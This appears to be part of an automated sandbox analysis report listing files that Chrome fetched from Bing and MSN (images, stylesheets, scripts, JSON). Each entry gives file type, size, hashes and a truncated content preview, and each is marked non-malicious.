                                                                                                                                                                                                                                                                        Preview:@media screen and (max-width:1366px){.mc_caro .hp_trivia_outer div .hp_trivia_inner{display:none}}.tray_cont{display:flex;position:absolute;width:100%;bottom:calc(5vh + 11.0625rem);transition:bottom .2s linear}@media screen and (max-height:929px){.tray_cont{bottom:calc(9.4375rem)}}.tray_cont .tray_outer{display:flex;margin:auto;height:65px;z-index:2}@media(pointer:fine){.tray_cont .tray_outer .tray.collapsed{opacity:0}.tray_cont .tray_outer:hover .tray.collapsed{opacity:1}}@media screen and (max-width:1366px){.tray_cont .tray_outer{height:65px;width:250px}}@media screen and (max-height:720px){.tray_cont .tray_outer{height:58px}}.tray_cont .tray{display:flex;margin:auto auto 0 auto;border-radius:6px;height:56px;background-color:rgba(34,34,34,.8);overflow:hidden;transition:width .1s ease-out,opacity .3s ease-out;opacity:1;z-index:1}.tray_cont .tray .open_btn{display:none;align-items:center;justify-content:center;width:80px;height:56px;cursor:pointer}.tray_cont .tray .open_btn:after{conte
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):18944
                                                                                                                                                                                                                                                                        Entropy (8bit):7.967445633426257
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e1hf75wMBpX/Rp7PWwFU5YBnBC129UDQpwys7MgM+v6a7inJJ8sowc:e3z5VpXpZ/U8BCgoQwXvjUJ8nwc
                                                                                                                                                                                                                                                                        MD5:508E8220AFAA5E75C6B4AF3926697CBF
                                                                                                                                                                                                                                                                        SHA1:A4449080D17596898B59331CBB032095850FE69A
                                                                                                                                                                                                                                                                        SHA-256:5037F7AF0741E73B2FA523B741A2BC2BE187C8D9E2BD9AD0A94143D1CCCAA3CB
                                                                                                                                                                                                                                                                        SHA-512:4F5596F84A88D2637068E41BA51281445BBE0D0505E87CCF63ED5BE6A46C6A2D3A8E9C0CA358B5BD095EE4BD5A8F25210F5AC9324D4C4A1808E527545A261367
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.ad448ebe2137b42cfb9424618fccc024&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...m..i.g.}..V.xX`.*h.:b...8..C.rG.J..r?J..qNh.~T/.O.H.f........-WN...T.g..46l....0.A,H `z.H.....ViB...@..,G...L..x...4...f;....B^^.V...`...s.D...s...0ylb.I=LO...n....... A,.....cs......T....V...~..[Z.5..@.!IC.b2..:..."d9.GQ.^..!.I.k.v...c..../ .....W!.S.w....;.h...E..?..dz..N.0.....9.].{V...kz....w..m.ke.lgc.Ua.....y9.\.|A.x[...h.B..KG2.....r/.!.>.9R.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4409
                                                                                                                                                                                                                                                                        Entropy (8bit):7.661436320849241
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                                                                                                                                                                                        MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                                                                                                                                                                                        SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                                                                                                                                                                                        SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                                                                                                                                                                                        SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:58:04....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.............................................................................................. (... ....@..........(.@..............(.................R. .......................f.....#x.....6.9.]...f.*...........|:......b...=....M}.}3/...H..{},k...x..`B.....z........y..9.yv.....9....>n...f...W......ug'.x..6:-3.a.iaHB.@.T.. .Q.@.)A.....At`..(..X!..0t).H...........s.uR6E.J.K9.@*.$.Es....&.........................!.. "A$10Bp.............o.wb.H2......p....H..m....ez.5.5....L.%.i....'..).s....$..q...E.....yxe-d<.VI...<s.~K....4.o.?.y.NY3r1..5...M9F..^Q...y..........>$.&r.g ..MK.qe....5.......~!.....\.&|....!5...`9.)F.R;.fY.%.&.={..R.A.....>.y....E.Q._....<.|_...J.....z&_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):671
                                                                                                                                                                                                                                                                        Entropy (8bit):5.014579690661168
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                                                                                                                                                                                        MD5:D9ED1A42342F37695571419070F8E818
                                                                                                                                                                                                                                                                        SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                                                                                                                                                                                        SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                                                                                                                                                                                        SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                        Entropy (8bit):4.2484633897908495
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tnq3ripj6Gnhrf9MiYjaM/Wxv1qUJHGjrIO3KAFz:VEipjbZf3YjGr4N3x
                                                                                                                                                                                                                                                                        MD5:407303FF19FBE8081F2BEAC9CF1AD7B9
                                                                                                                                                                                                                                                                        SHA1:CCFDFD943C6DAD51EA5E9804F15A3E3EBC8BA642
                                                                                                                                                                                                                                                                        SHA-256:2DF3CB601B3DE31BFC06AA7626183B7BF7F3624025BDA11C766D4CF0335B89B1
                                                                                                                                                                                                                                                                        SHA-512:BB2C515E75E0334D66BFC7765CED6654A074309A38B353DD8142D4D34C9D2F43DDD3C7D4336A65F3208D7BA38353C05793BBE0AE67EEC1803532F6D744B3E04A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/zP39lDxtrVHqXpgE8Vo-PryLpkI.svg
                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 40 40" viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg"><path d="m20 0c-11.046 0-20 8.954-20 20s8.954 20 20 20 20-8.954 20-20-8.954-20-20-20zm13.082 33.082c-3.351 3.349-7.971 5.418-13.082 5.418s-9.731-2.069-13.081-5.418c-3.349-3.351-5.419-7.971-5.419-13.082s2.07-9.731 5.419-13.081c3.35-3.349 7.97-5.419 13.081-5.419s9.731 2.07 13.082 5.419c3.349 3.35 5.418 7.97 5.418 13.081s-2.069 9.731-5.418 13.082zm-13.082-13.078c2.761 0 5-2.239 5-5s-2.239-5-5-5-5 2.239-5 5 2.239 5 5 5zm0-8.5c1.933 0 3.5 1.567 3.5 3.5s-1.567 3.5-3.5 3.5-3.5-1.567-3.5-3.5 1.567-3.5 3.5-3.5zm5.754 10.496h-11.501c-1.242 0-2.249 1.007-2.249 2.249v.578c0 .893.318 1.756.898 2.435 1.566 1.834 3.952 2.739 7.098 2.739 3.145 0 5.533-.905 7.102-2.738.581-.679.901-1.544.901-2.439v-.575c0-1.243-1.007-2.249-2.249-2.249zm.749 2.824c0 .536-.192 1.056-.541 1.463-1.257 1.468-3.224 2.214-5.962 2.214s-4.704-.746-5.958-2.213c-.348-.407-.539-.926-.539-1.461v-.578c0-.414.335-.749.749-.749h11.502c.414 0
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1240
                                                                                                                                                                                                                                                                        Entropy (8bit):4.696555314984949
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7/JxwTBjVaqbvkqFvgBV6ilS8DBMSfrVAd1yACHuMy8s:4JGl1b8qFvgBoivTVAyAM
                                                                                                                                                                                                                                                                        MD5:87A9C15B6574AAFB2D82C36329355FE0
                                                                                                                                                                                                                                                                        SHA1:78B72F92FC453BD5237996AE455CCF5F3E0F30CC
                                                                                                                                                                                                                                                                        SHA-256:F9D8BD135C9B46CE8C30B30720E7B6A86BABF2005CC71388A68AB571224530EC
                                                                                                                                                                                                                                                                        SHA-512:3369BDC076917C0BF4578B5C9FFC92BF24F7B8A8832FC8A1AF6989ADE72E27B3F99583BEFACFABE9799AAC2BBA94E172B5960A3094AF8CC48AD1A3E7569D9E4E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx...?H.Q...R&..9..EW.....!-..".....*.m"..........$H......(>m. ~....s.....;p.....s.=.^.z...@...#.x....S.......@....7.M.R....j...d..v..l...."......P.Tl.z=.....`0.F....>(...\..X,..v....d2!......z..'''(.J0...h.Z[...)G..d.x}}....#.. ..........a&.A0......P...`..9*....<.......::........ppp.............0..@.&.N.lK.R<>>b4.A"....$T+...!*...N'G..T*y...;..4...P(..Q.P.^.V.S..V...n.GGGlS...!(.I..g=..1.L.^,......h...E.\....j...9.....www\..G...|\dn#..Z...A..."Q.j....b..X,.....k..Eg...<I...$t......*^^^..F?.I....J....Y\]]a>......!......$.........~.L,...L..Y{c....IEND.B`.............................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8370), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):8370
                                                                                                                                                                                                                                                                        Entropy (8bit):5.294190759877552
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:65Gj4ar/bZpC5Icn2IUp5jN2Rw20YL/JxaquRG/2RdIRVVR00UcTyHX9LF:rFGTyIG20YL/HaFRGOI5UcTyHf
                                                                                                                                                                                                                                                                        MD5:4517A64EBB1503C4FB56EA2B8F484013
                                                                                                                                                                                                                                                                        SHA1:E33CD4DD0876AC17F27B1048187D55548113DF2E
                                                                                                                                                                                                                                                                        SHA-256:92637EF6CF687AED07044B4B55DD2A7028AC33E2DE7A30CE415B39D55AE7E588
                                                                                                                                                                                                                                                                        SHA-512:6E73379329F4660BAFF5DF8A89F56DBA263911EEF520479CE5ED1EC3CE0E8A4EA3929A5DF56D67BB07B94E7A85D054A8607F8890029E5550E807A386C9E5A919
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/msnews/publishers-service-client.bd0469721de4067eb3cf.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["msnews/publishers-service-client"],{55128:function(e,t,i){var s;i.d(t,{S:function(){return s},PublisherServiceClient:function(){return S}}),function(e){e.More="More",e.Mute="Mute",e.Read="Read"}(s||(s={}));var n=i(33940),r=i(56692),o=i(45506),d=i(76754),u=i(63535),a=i(5696),l=i(61442),c=i(17157),h=i(59207),v=i(11380),p=i(81866),y=i(51125),m=i(12108),f=i(33799),g=i(51671);class S{constructor(e,t=!0){this.fetchImpl=e,this.addPageInfoToOcid=t,this.followedPublishersEndpoint="v1/News/Users/Me/PreferredProviders",this.followedSourcesEndpoint="msn/sources",this.publishersServiceEndpoint="Msn/Providers",this.actionsServiceEndpoint="Graph/Actions",this.followActionSourceEndpoint="community/follows",this.ocid="feeds"}getOcid(){return this.ocid}getUserMutedPublishers(){return(0,n.mG)(this,void 0,void 0,(function*(){const e=yield this.getUserActions(s.Mute);if(!e||!e.value)return nul
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):31512
                                                                                                                                                                                                                                                                        Entropy (8bit):5.678669067994438
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:rUFw5Xmdfg58CMsk66xBo5EUWC5MJ4YkztsVUOJEvU04sDYwe/BfTRkJ5rr9:rUekd4uxS6UWC5MJ4Ykzts+WUNfU5pS
                                                                                                                                                                                                                                                                        MD5:CBC4BBC78359F9FCB744B903940E8E5C
                                                                                                                                                                                                                                                                        SHA1:C96740150E20653EB95744A136115A55486B75A8
                                                                                                                                                                                                                                                                        SHA-256:9BDF7208534B83596A750D2AD8F102260301F1652FB9F6479804A4D923C3031B
                                                                                                                                                                                                                                                                        SHA-512:848BF36BC9DC4CCF54D29828F302044CE252EE2A79921E31413E0C5C97C4D557A5ACF6A16ACB10432D203F163017CD9A70195C2485F25BE47AA0C8A5F69E59D6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/hp/api/model
                                                                                                                                                                                                                                                                        Preview:{"Scripts":[{"Path":"https://r.bing.com/rp/pF2PfMNHZl6kUOVLn4XEGHZP_z0.js","Postloaded":true},{"Path":"https://r.bing.com/rp/yfhemBfy2-1hsn-Pzs7ZcFHIdVM.js","Postloaded":true}],"Styles":[{"Path":"https://r.bing.com/rp/qz_XABEk9uinJqFMD6b6yPjYYTU.css","Postloaded":false},{"Path":"https://r.bing.com/rp/RwGC9aq3HWFHA4-nvqf37VWlckM.css","Postloaded":false},{"Path":"https://r.bing.com/rp/6wDd80TfrjsxqxnEl7ODpSWRxdY.css","Postloaded":true},{"Path":"https://r.bing.com/rp/d_DmhogwQOWjbEX-g0oLpQVcA5w.css","Postloaded":true}],"CustomFields":{"VideoYuleLog":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2019/YuleLog/1080/Fireplace_GettyRR_98571085_1080.mp4","VideoAurora":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2019/Aurora/1080/1920_FinlandAurora_SS_13482083.mp4","AudioYuleLogMp3":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2019/YuleLog/audio/CozyFirepace_Getty_553682.mp3","ImageToShare":"https://az12410.vo.msecnd.net/homepage/specialexp/holiday/2020/h
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5125
                                                                                                                                                                                                                                                                        Entropy (8bit):7.920185213246574
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEmDqVpTtrJz4BgFVHuMho/fGQDBYF10bMaJFsBd5tWgt1b:yg7Dqvf4BgbHuMGf+1isr5tb1b
                                                                                                                                                                                                                                                                        MD5:94E93256E82CF1BF7F7F3F75CB330B17
                                                                                                                                                                                                                                                                        SHA1:E2A7B8EA4B1CB157FFEEFFFC6F128A8F71DED395
                                                                                                                                                                                                                                                                        SHA-256:FD75FEADAFDFB41457754E037C26B5AC8F8A141501AC885FF9DFC8185B2A8F14
                                                                                                                                                                                                                                                                        SHA-512:A2B1B1ECC3EACA67678C2B08B8D506672C50740EFC0E221D62E0557E131EA42ED6B6BEF331EE771E2FCAD46C4AB16E6946104324C22DFD1743006A31B8287F41
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_m7hOW9tCEo-hY3Oick5J2g&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..p).T.7p...X.{...y=*K..l..{...Lnl...<.W...;YnI.1N.F*......................4........=*.H'f.T.%u...qF+...x.......v.....Q~f....^s/.^.Q......`...h....Q...\..=.4.k.|#..z...4.....I.'.)...zz2.....A...M14..J.L".#.a........o......e|.HK..c...A.N:{...?..j......}3g.\.Q.|..Rn..$.<._....n#.w1i..y[.1.....l.L.....x.7......T. q..^..|3..M.5......`?.....46q...`.8S.#.^&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1274
                                                                                                                                                                                                                                                                        Entropy (8bit):5.30620342636407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                                                                                                                                                                                        MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                                                                                                                                                                                        SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                                                                                                                                                                                        SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                                                                                                                                                                                        SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/fEzca4bKO4pRulhVlOoat7eLgmU.js
                                                                                                                                                                                                                                                                        Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6602
                                                                                                                                                                                                                                                                        Entropy (8bit):7.94064342551898
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:ygwBDqHxDzbqllo8AXbpYEm2PcTdHdSiyKllYBVrc:ygwBDyXbqlTybFu9yaKBu
                                                                                                                                                                                                                                                                        MD5:2EC5FDE3796806B70652B8CF1A6CD9B4
                                                                                                                                                                                                                                                                        SHA1:A994F484136E6582D4D3F5E98FC45A87C7D1FA00
                                                                                                                                                                                                                                                                        SHA-256:544A2240A7DA1E493494687EF632B25ECAF0953190F69CA85180486F6D623175
                                                                                                                                                                                                                                                                        SHA-512:51C9A44A72DF57CC270D9ECCAF7B2474B4B8ADF70B0EF4BCE0F7B984B7CEC3AEC27DC874BF2AAAF5E06CC749F50139CB0E4BF2CAB2ADB0CFAA401E69CA95A585
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_qfhqzK72Ua1IIcPjjPZ21Q&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...WCo.....kpn._-.W$.....3m.Z6..5.1..ts:.P.J....=Os.u3...we...D.a.L\YD.f.0.s6.N...Dm...q....8....M^ig..}+Kv.......O..>.@..I .S.+...Z.IM].Z.kQ..4.b..H...*...c....Gd"3F.....l.....}u.[Cwl.'.v..9...G.P.!...I..v..rX..Zm......5mr.V..I.X.8.,0..~...M...ue ug..bV...I..M............n\.n.....Sq..[9?.c)_C..]..M..aH....^I<Q<..hc.`.p.b_..g.K.)d..H..l!'.....I...../.(
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2737
                                                                                                                                                                                                                                                                        Entropy (8bit):5.143739593947487
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:TSEFkrgXL4vxyL9oG5e/LGlCbux1ZkCLtgQQ/TY740a3HOzw3B+THvRkqBHtoUqM:mrTeRkaAburmvlSxINwTqeW1MN
                                                                                                                                                                                                                                                                        MD5:8F824B93502AA4AA1CF9F8A77E6B7F10
                                                                                                                                                                                                                                                                        SHA1:7EE42795FD98366080A6D79A134F18CA84DDB064
                                                                                                                                                                                                                                                                        SHA-256:6CFE41748D6981393CFDB649AB1048EE0F08C1F2BAFAF7E5BECA030DD77EBC56
                                                                                                                                                                                                                                                                        SHA-512:CBB60A1DB15705AAB7BA4AC64F7AE960BD30317E301204C65A7ED0C5C7C10333120523D5E101A9874E8858FCCC7C5981AB996AB57708FDA09D578E8CFCCA77F1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/temprise1.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="72" height="72" viewBox="0 0 72 72" fill="none" xmlns="http://www.w3.org/2000/svg">.<g filter="url(#filter0_f_2673_133239)">.<path d="M35.7195 13.5491C35.7195 7.72157 30.9337 2.9989 25.0317 2.9989C19.1296 2.9989 14.3439 7.72157 14.3439 13.5491V41.2798C11.0857 44.1804 9 48.3335 9 53.0008C9 61.7448 16.1813 68.8275 25.0317 68.8275C33.8848 68.8275 41.0634 61.7448 41.0634 53.0008C41.0634 48.3335 38.9776 44.1804 35.7195 41.2798V13.5491Z" fill="url(#paint0_linear_2673_133239)" fill-opacity="0.2"/>.</g>.<path d="M36.6355 13.5766C36.6355 7.73387 31.8498 2.9989 25.9477 2.9989C20.0456 2.9989 15.2599 7.73387 15.2599 13.5766V41.3795C12.0018 44.2877 9.91602 48.4516 9.91602 53.131C9.91602 61.8977 17.0973 68.9989 25.9477 68.9989C34.8008 68.9989 41.9794 61.8977 41.9794 53.131C41.9794 48.4516 39.8936 44.2877 36.6355 41.3795V13.5766Z" fill="url(#paint1_linear_2673_133239)"/>.<rect x="21.9398" y="9.99887" width="8.01584" height="27" rx="4.00792" fill="black" fill-opacity="0.2"/>.<path fill-rul
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):257
                                                                                                                                                                                                                                                                        Entropy (8bit):4.781091704776374
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:qMH4WXMHwmnIB4JmhyfAIB4Jmml0X2IUJIB4JrNOsK1A4JWW7jKYHVA4JRGYdA4S:q6XzD4jr43ldI74FNQlNj7jM9TlMlbSr
                                                                                                                                                                                                                                                                        MD5:51A9EA95D5ED461ED98AC3D23A66AA15
                                                                                                                                                                                                                                                                        SHA1:62FBB857B873BD79BEE7F16D0766A452FA2798A3
                                                                                                                                                                                                                                                                        SHA-256:A5B4181611E951FAECD6C164D704569C633E95FE68D3D1934B911A089EBF70E8
                                                                                                                                                                                                                                                                        SHA-512:CEE4231894F82627E50EC746D7C150E5303A1BF8864D7B084173B9D17663A27CC2915F5D0D4DC0602FE26D9EAA10DD98CF3422E7601F520EF34D45C9A506D6F7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var BM=BM||{};BM.rules={"#sc_hdu":[-1,-1,1],"#hp_id_hdr":[-1,-1,1],"#hp_container":[-1,-1,1],".hp_sw_logo":[-1,-1,0],".b_searchboxForm":[-1,-1,0],"#crs_pane":[-1,-1,0],"#sb_foot":[-1,-1,0],"#sh_rdiv":[-1,-1,0],"img,div[data-src]":[-1,-1,0],iframe:[-1,-1,0]}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
